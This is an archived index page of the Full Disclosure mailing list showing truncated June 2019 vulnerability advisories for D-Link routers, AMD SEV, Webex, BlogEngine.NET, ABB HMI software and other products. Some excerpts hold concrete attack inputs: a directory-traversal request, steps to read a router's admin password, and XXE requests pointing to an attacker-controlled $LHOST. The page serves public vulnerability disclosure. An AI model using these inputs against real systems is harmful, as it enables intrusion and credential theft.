Full Disclosure

Syndicate content
A public, vendor-neutral forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. More importantly, fresh vulnerabilities sometimes hit this list many hours or days before they pass through the Bugtraq moderation queue.
Updated: 10 sec ago

D-LINK admin password in plain text if "user" or "User" use blank password

25 June, 2019 - 13:03

Posted by Marty on Jun 25

The problem in the following models :

DIR-652   
DIR-615   
DIR-827   
DIR-615   
DIR-657   
DIR-825   

If login to  web interface as "User" or "user" , and navigate to url :  

http://<ip>:port/wizard_wan.asp   

in web code page:

view-source:<ip>:port/wizard_wan.asp

scroll down page and bang :

administrator password in plain text

ports : 8080  or  8081  .

---
Ta wiadomość została...

AMD-SEV: Platform DH key recovery via invalid curve attack (CVE-2019-9836)

25 June, 2019 - 13:03

Posted by Cfir Cohen via Fulldisclosure on Jun 25

Overview
========
AMD Secure Encrypted Virtualization (SEV) is a hardware memory encryption
feature. SEV protects guest virtual machines from the hypervisor, provides
confidentiality guarantees at runtime and remote attestation at launch
time. See [1] for details. SEV key management code runs inside the Platform
Security Processor (PSP) [2].

The SEV elliptic-curve (ECC) implementation was found to be vulnerable to
an invalid curve attack. At...

Webex meetings are vulnerable to mitm

24 June, 2019 - 22:24

Posted by RDX Guy on Jun 24

https://pankajupadhyay.in/2019/06/24/webex-meetings-are-vulnerable-to-mitm/

"In my free time, I was looking at some Android applications and noticed
that I was able to intercept SSL traffic for Webex Meetings app. When
explored it further, I found that Webex Meetings mobile app accepts
self-signed certificates. Also there is no certificate pinning enabled.

This makes Webex meet app vulnerable to Man in the middle attack.

Users of this...

BlogEngine.NET 3.3.7 and earlier Directory Traversal + Listing

24 June, 2019 - 22:23

Posted by aaron bishop on Jun 24

*CVE-2019-10717* - A Directory Traversal + Directory Listing exists on
BlogEngine.Net 3.3.7 and earlier through the *path* parameter used by the
/api/filemanager endpoint. A request such as:

https://$HOST/api/filemanager?path=*%2F..%2f..%2f*

Discloses the contents of the application root:

....
{
"IsChecked": false,
"SortOrder": 25,
"Created": "5/26/2018 1:53:02 PM",
"Name":...

XL-19-012 - ABB IDAL HTTP Server Uncontrolled Format String Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-012 - ABB IDAL HTTP Server Uncontrolled Format String Vulnerability
========================================================================

Identifiers
-----------
XL-19-012
CVE-2019-7228
ABBVU-IAMF-1902007

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL HTTP...

Fortinet FortiCam FCM-MB40 Vulnerabilities

24 June, 2019 - 02:06

Posted by XORcat on Jun 24

Original posting: https://xor.cat/2019/06/19/fortinet-forticam-vulns/

## Background

In March of 2019 I discovered five vulnerabilities in Fortinet's
FortiCam FCM-MB40[1] product.

Part-way through disclosing this vulnerability, I discovered that the
FCM-MB40 is manufactured by a company called Dynacolor Inc[2], which
calls the product "Q2-H"[3].

The FortiCam FCM-MB40 software version which I found these
vulnerabilities in was...

APPLE-SA-2019-6-20-1 AirPort Base Station Firmware Update 7.8.1

24 June, 2019 - 02:06

Posted by Apple Product Security via Fulldisclosure on Jun 24

APPLE-SA-2019-6-20-1 AirPort Base Station Firmware Update 7.8.1

AirPort Base Station Firmware Update 7.8.1 is now available and
addresses the following:

AirPort Base Station Firmware
Available for: AirPort Express, AirPort Extreme, and AirPort Time
Capsule base stations with 802.11n
Impact: A remote attacker may be able to leak memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8581: Lucio Albornoz...

XL-19-011 - ABB IDAL HTTP Server Stack-Based Buffer Overflow Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-011 - ABB IDAL HTTP Server Stack-Based Buffer Overflow Vulnerability
========================================================================

Identifiers
-----------
XL-19-011
CVE-2019-7232
ABBVU-IAMF-1902009

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL HTTP...

XL-19-010 - ABB IDAL HTTP Server Authentication Bypass Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-010 - ABB IDAL HTTP Server Authentication Bypass Vulnerability
========================================================================

Identifiers
-----------
XL-19-010
CVE-2019-7226
ABBVU-IAMF-1902005

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL HTTP...

XL-19-009 - ABB HMI Hardcoded Credentials Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-009 - ABB HMI Hardcoded Credentials Vulnerability
========================================================================

Identifiers
-----------
XL-19-009
CVE-2019-7225
ABBVU-IAMF-1902004
ABBVU-IAMF-1902011
ABBVU-IAMF-1902002

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
xen1thLabs - Software Labs

Vulnerability summary
---------------------
The affected...

XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability
========================================================================

Identifiers
-----------
XL-19-008
CVE-2019-7227
ABBVU-IAMF-1902006

CVSS Score
----------
7.3 (AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL FTP server fails...

XL-19-006 - ABB HMI Outdated Software Components

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-006 - ABB HMI Outdated Software Components
========================================================================

Identifiers
-----------
XL-19-006
ABBVU-IAMF-1902001
ABBVU-IAMF-1902010

CVSS Score
----------
7.1 (AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
xen1thLabs - Software Labs

Vulnerability summary
---------------------
ABB HMI uses outdated software components that are...

XL-19-007 - ABB IDAL FTP Server Buffer Overflow Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-007 - ABB IDAL FTP Server Buffer Overflow Vulnerability
========================================================================

Identifiers
-----------
XL-19-007
CVE-2019-7231
ABBVU-IAMF-1902010

CVSS Score
----------
6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL FTP server is...

XL-19-005 - ABB HMI Absence of Signature Verification Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-005 - ABB HMI Absence of Signature Verification Vulnerability
========================================================================

Identifiers
-----------
XL-19-005
CVE-2019-7229
ABBVU-IAMF-1902003
ABBVU-IAMF-1902012

CVSS Score
----------
8.3 (AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
xen1thLabs - Software Labs

Vulnerability summary
---------------------
ABB HMI uses two...

XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability

24 June, 2019 - 02:06

Posted by xen1thLabs on Jun 24

XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability
========================================================================

Identifiers
-----------
XL-19-004
CVE-2019-7230
ABBVU-IAMF-1902008

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL FTP...

Re: Multiple Cross-site Scripting Vulnerabilities in Shopware 5.5.6

24 June, 2019 - 02:04

Posted by Henri Salo on Jun 24

Please use CVE-2019-12935 for this vulnerability.

Quarking Password Manager 3.1.84 - Clickjacking Vulnerability

24 June, 2019 - 02:04

Posted by gionreale on Jun 24

Quarking Password Manager 3.1.84 suffers from a clickjacking
vulnerability caused by allowing * within web_accessible_resources. An
attacker can take advantage of this vulnerability and cause significant
harm.

CVE-2019-12880

BlogEngine.Net XXE issues

24 June, 2019 - 02:03

Posted by aaron bishop on Jun 24

BlogEngine.NET, versions 3.3.7 and earlier, are vulnerable to an
Out-of-band XXE attack through syndication.axd and pingback.axd.

*syndication.axd *accepts an external xml as the value for apml through a
request such as:

http://$RHOST/blog/syndication.axd?*apml=http://$LHOST/oob.xml*

*pingback.axd* will parse a POST with an XML body, such as:

<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://$LHOST/ex.dtd&quot...

PC-Doctor Toolbox before 7.3 has an Uncontrolled Search Path Element

21 June, 2019 - 17:49

Posted by Micah Wiseley on Jun 21

Full Disclosure

I. VULNERABILITY
-------------------------
Uncontrolled search path element vulnerability in PC-Doctor Toolbox prior
to version 7.3 allows local users to gain privileges and conduct DLL
hijacking attacks via a trojan horse DLL located in an unsecured directory
which has been added to the PATH environment variable.

II. CVE REFERENCE
-------------------------
CVE-2019-12280

III. VENDOR
-------------------------
PC-Doctor, Inc....

CVE-2019-12323 / HC10 HC.Server Service 10.14 / Remote Invalid Pointer Write

18 June, 2019 - 03:27

Posted by hyp3rlinx on Jun 18

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt
[+] ISR: ApparitionSec

[Vendor]
www.hostingcontroller.com

[Product]
HC10 HC.Server Service 10.14

HC10 is a unified hosting automation control panel for web hosts and Cloud
based service providers to manage both Windows & Linux servers
simultaneously as part...